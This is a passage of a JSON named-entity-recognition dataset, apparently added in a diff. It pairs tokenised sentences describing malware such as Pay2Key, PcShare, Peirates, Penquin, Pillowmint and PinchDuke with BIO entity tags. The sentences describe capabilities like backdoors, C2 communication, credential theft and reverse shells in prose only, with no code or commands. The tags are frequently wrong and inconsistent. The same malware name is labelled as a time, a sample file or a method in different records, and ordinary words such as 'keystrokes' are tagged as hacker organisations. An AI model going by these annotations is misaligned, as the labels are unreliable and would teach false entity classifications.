"Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "lists", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pasam", + "creates", + "a", + "backdoor", + "through", + "which", + "remote", + "attackers", + "can", + "retrieve", + "information", + "such", + "as", + "hostname", + "and", + "free", + "disk", + "space." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pass-The-Hash", + "Toolkit", + "can", + "perform", + "pass", + "the", + "hash." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "has", + "used", + "RSA", + "encrypted", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "can", + "encrypt", + "data", + "on", + "victim's", + "machines", + "using", + "RSA", + "and", + "AES", + "algorithms", + "in", + "order", + "to", + "extort", + "a", + "ransom", + "payment", + "for", + "decryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "can", + "remove", + "its", + "log", + "file", + "from", + "disk." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "has", + "designated", + "machines", + "in", + "the", + "compromised", + "network", + "to", + "serve", + "as", + "reverse", + "proxy", + "pivot", + "points", + "to", + "channel", + "communications", + "with", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "has", + "sent", + "its", + "public", + "key", + "to", + "the", + "C2", + "server", + "over", + "TCP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "can", + "stop", + "the", + "MS", + "SQL", + "service", + "at", + "the", + "end", + "of", + "the", + "encryption", + "process", + "to", + "release", + "files", + "locked", + "by", + "the", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "has", + "the", + "ability", + "to", + "gather", + "the", + "hostname", + "of", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pay2Key", + "can", + "identify", + "the", + "IP", + "and", + "MAC", + "addresses", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "created", + "the", + "`HKCU\\\\Software\\\\Classes\\\\CLSID\\\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\\\InprocServer32`", + "Registry", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "collect", + "files", + "and", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "decrypted", + "its", + "strings", + "by", + "applying", + "a", + "XOR", + "operation", + "and", + "a", + "decompression", + "using", + "a", + "custom", + "implemented", + "LZM", + "algorithm." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "been", + "encrypted", + "with", + "XOR", + "using", + "different", + "32-long", + "Base16", + "strings", + "and", + "compressed", + "with", + "LZW", + "algorithm." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "upload", + "files", + "and", + "information", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "deleted", + "its", + "files", + "and", + "components", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "used", + "an", + "invalid", + "certificate", + "in", + "attempt", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "the", + "ability", + "to", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "been", + "named", + "`wuauclt.exe`", + "to", + "appear", + "as", + "the", + "legitimate", + "Windows", + "Update", + "AutoUpdate", + "Client." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "delete", + "its", + "persistence", + "mechanisms", + "from", + "the", + "registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "used", + "a", + "variety", + "of", + "Windows", + "API", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "obtain", + "a", + "list", + "of", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PcShare", + "payload", + "has", + "been", + "injected", + "into", + "the", + "`logagent.exe`", + "and", + "`rdpclip.exe`", + "processes." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "search", + "the", + "registry", + "files", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "used", + "`rundll32.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "take", + "screen", + "shots", + "of", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "obtain", + "the", + "proxy", + "settings", + "of", + "a", + "compromised", + "machine", + "using", + "`InternetQueryOptionA`", + "and", + "its", + "IP", + "address", + "by", + "running", + "`nslookup", + "myip.opendns.comresolver1.opendns.com\\r\\n`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "capture", + "camera", + "video", + "as", + "part", + "of", + "its", + "collection", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "has", + "used", + "HTTP", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PcShare", + "can", + "execute", + "`cmd`", + "commands", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pcexter", + "has", + "been", + "distributed", + "and", + "executed", + "as", + "a", + "DLL", + "file", + "named", + "Vspmsg.dll", + "via", + "DLL", + "side-loading." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Pcexter", + "can", + "upload", + "files", + "from", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pcexter", + "can", + "upload", + "stolen", + "files", + "to", + "OneDrive", + "storage", + "accounts", + "via", + "HTTP", + "`POST`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pcexter", + "has", + "the", + "ability", + "to", + "search", + "for", + "files", + "in", + "specified", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "use", + "stolen", + "service", + "account", + "tokens", + "to", + "perform", + "its", + "operations.", + "It", + "also", + "enables", + "adversaries", + "to", + "switch", + "between", + "valid", + "service", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "use", + "stolen", + "service", + "account", + "tokens", + "to", + "perform", + "its", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "query", + "the", + "query", + "AWS", + "and", + "GCP", + "metadata", + "APIs", + "for", + "secrets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "list", + "AWS", + "S3", + "buckets." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "query", + "the", + "Kubernetes", + "API", + "for", + "secrets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "use", + "`kubectl`", + "or", + "the", + "Kubernetes", + "API", + "to", + "run", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "enumerate", + "Kubernetes", + "pods", + "in", + "a", + "given", + "namespace." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "dump", + "the", + "contents", + "of", + "AWS", + "S3", + "buckets.", + "It", + "can", + "also", + "retrieve", + "service", + "account", + "tokens", + "from", + "kOps", + "buckets", + "in", + "Google", + "Cloud", + "Storage", + "or", + "S3." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "deploy", + "a", + "pod", + "that", + "mounts", + "its", + "node’s", + "root", + "file", + "system,", + "then", + "execute", + "a", + "command", + "to", + "create", + "a", + "reverse", + "shell", + "on", + "the", + "node." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "gain", + "a", + "reverse", + "shell", + "on", + "a", + "host", + "node", + "by", + "mounting", + "the", + "Kubernetes", + "hostPath." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "can", + "initiate", + "a", + "port", + "scan", + "against", + "a", + "given", + "IP", + "address." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peirates", + "gathers", + "Kubernetes", + "service", + "account", + "tokens", + "using", + "a", + "variety", + "of", + "techniques." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "encrypt", + "communications", + "using", + "the", + "BlowFish", + "algorithm", + "and", + "a", + "symmetric", + "key", + "exchanged", + "with", + "Diffie", + "Hellman." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "use", + "Cron", + "to", + "create", + "periodic", + "and", + "pre-scheduled", + "background", + "jobs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "has", + "encrypted", + "strings", + "in", + "the", + "binary", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "execute", + "the", + "command", + "code", + "<code>do_upload</code>", + "to", + "send", + "files", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "delete", + "downloaded", + "executables", + "after", + "running", + "them." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "use", + "the", + "command", + "code", + "<code>do_vslist</code>", + "to", + "send", + "file", + "names,", + "size,", + "and", + "status", + "to", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "remove", + "strings", + "from", + "binaries." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "execute", + "the", + "command", + "code", + "<code>do_download</code>", + "to", + "retrieve", + "remote", + "files", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "add", + "the", + "executable", + "flag", + "to", + "a", + "downloaded", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "has", + "mimicked", + "the", + "Cron", + "binary", + "to", + "hide", + "itself", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "sniff", + "network", + "traffic", + "to", + "look", + "for", + "packets", + "matching", + "specific", + "conditions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Penquin", + "C2", + "mechanism", + "is", + "based", + "on", + "TCP", + "and", + "UDP", + "packets." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "installs", + "a", + "`TCP`", + "and", + "`UDP`", + "filter", + "on", + "the", + "`eth0`", + "interface." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "report", + "the", + "file", + "system", + "type", + "and", + "disk", + "space", + "of", + "a", + "compromised", + "host", + "to", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "report", + "the", + "IP", + "of", + "the", + "compromised", + "host", + "to", + "attacker", + "controlled", + "infrastructure." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "will", + "connect", + "to", + "C2", + "only", + "after", + "sniffing", + "a", + "\"magic", + "packet\"", + "value", + "in", + "TCP", + "or", + "UDP", + "packets", + "matching", + "specific", + "conditions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Penquin", + "can", + "execute", + "remote", + "commands", + "using", + "bash", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Peppy", + "has", + "the", + "ability", + "to", + "automatically", + "exfiltrate", + "files", + "and", + "keylogs." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Peppy", + "can", + "identify", + "specific", + "files", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peppy", + "can", + "download", + "and", + "execute", + "remote", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Peppy", + "can", + "log", + "keystrokes", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peppy", + "can", + "take", + "screenshots", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peppy", + "can", + "use", + "HTTP", + "to", + "communicate", + "with", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Peppy", + "has", + "the", + "ability", + "to", + "execute", + "shell", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "used", + "a", + "malicious", + "shim", + "database", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "encrypted", + "stolen", + "credit", + "card", + "information", + "with", + "AES", + "and", + "further", + "encoded", + "it", + "with", + "Base64." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "used", + "the", + "NtQueueApcThread", + "syscall", + "to", + "inject", + "code", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pillowmint", + "can", + "uninstall", + "the", + "malicious", + "service", + "from", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "collected", + "credit", + "card", + "data", + "using", + "native", + "API", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "been", + "decompressed", + "by", + "included", + "shellcode", + "prior", + "to", + "being", + "launched." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "deleted", + "the", + "filepath", + "<code>%APPDATA%\\Intel\\devmonsrv.exe</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "stored", + "a", + "compressed", + "payload", + "in", + "the", + "Registry", + "key", + "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "modified", + "the", + "Registry", + "key", + "<code>HKLM\\SOFTWARE\\Microsoft\\DRM</code>", + "to", + "store", + "a", + "malicious", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "used", + "multiple", + "native", + "Windows", + "APIs", + "to", + "execute", + "and", + "conduct", + "process", + "injections." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "been", + "compressed", + "and", + "stored", + "within", + "a", + "registry", + "key.", + "Pillowmint", + "has", + "also", + "obfuscated", + "the", + "AES", + "key", + "used", + "for", + "encryption." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "used", + "a", + "PowerShell", + "script", + "to", + "install", + "a", + "shim", + "database." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "can", + "iterate", + "through", + "running", + "processes", + "every", + "six", + "seconds", + "collecting", + "a", + "list", + "of", + "processes", + "to", + "capture", + "from", + "later." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Pillowmint", + "has", + "used", + "shellcode", + "which", + "reads", + "code", + "stored", + "in", + "the", + "registry", + "keys", + "<code>\\REGISTRY\\SOFTWARE\\Microsoft\\DRM</code>", + "using", + "the", + "native", + "Windows", + "API", + "as", + "well", + "as", + "read", + "<code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces</code>", + "as", + "part", + "of", + "its", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "steals", + "credentials", + "from", + "compromised", + "hosts.", + "PinchDuke's", + "credential", + "stealing", + "functionality", + "is", + "believed", + "to", + "be", + "based", + "on", + "the", + "source", + "code", + "of", + "the", + "Pinch", + "credential", + "stealing", + "malware", + "(also", + "known", + "as", + "LdPinch).", + "Credentials", + "targeted", + "by", + "PinchDuke", + "include", + "ones", + "associated", + "with", + "many", + "sources", + "such", + "as", + "The", + "Bat!,", + "Yahoo!,", + "Mail.ru,", + "Passport.Net,", + "Google", + "Talk,", + "and", + "Microsoft", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-SecTeam", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "steals", + "credentials", + "from", + "compromised", + "hosts.", + "PinchDuke's", + "credential", + "stealing", + "functionality", + "is", + "believed", + "to", + "be", + "based", + "on", + "the", + "source", + "code", + "of", + "the", + "Pinch", + "credential", + "stealing", + "malware", + "(also", + "known", + "as", + "LdPinch).", + "Credentials", + "targeted", + "by", + "PinchDuke", + "include", + "ones", + "associated", + "with", + "many", + "sources", + "such", + "as", + "Netscape", + "Navigator,", + "Mozilla", + "Firefox,", + "Mozilla", + "Thunderbird,", + "and", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "collects", + "user", + "files", + "from", + "the", + "compromised", + "host", + "based", + "on", + "predefined", + "file", + "extensions." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "searches", + "for", + "files", + "created", + "within", + "a", + "certain", + "timeframe", + "and", + "whose", + "file", + "extension", + "matches", + "a", + "predefined", + "list." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "steals", + "credentials", + "from", + "compromised", + "hosts.", + "PinchDuke's", + "credential", + "stealing", + "functionality", + "is", + "believed", + "to", + "be", + "based", + "on", + "the", + "source", + "code", + "of", + "the", + "Pinch", + "credential", + "stealing", + "malware", + "(also", + "known", + "as", + "LdPinch).", + "Credentials", + "targeted", + "by", + "PinchDuke", + "include", + "ones", + "associated", + "many", + "sources", + "such", + "as", + "WinInet", + "Credential", + "Cache,", + "and", + "Lightweight", + "Directory", + "Access", + "Protocol", + "(LDAP)." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "gathers", + "system", + "configuration", + "information." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PinchDuke", + "transfers", + "files", + "from", + "the", + "compromised", + "host", + "via", + "HTTP", + "or", + "HTTPS", + "to", + 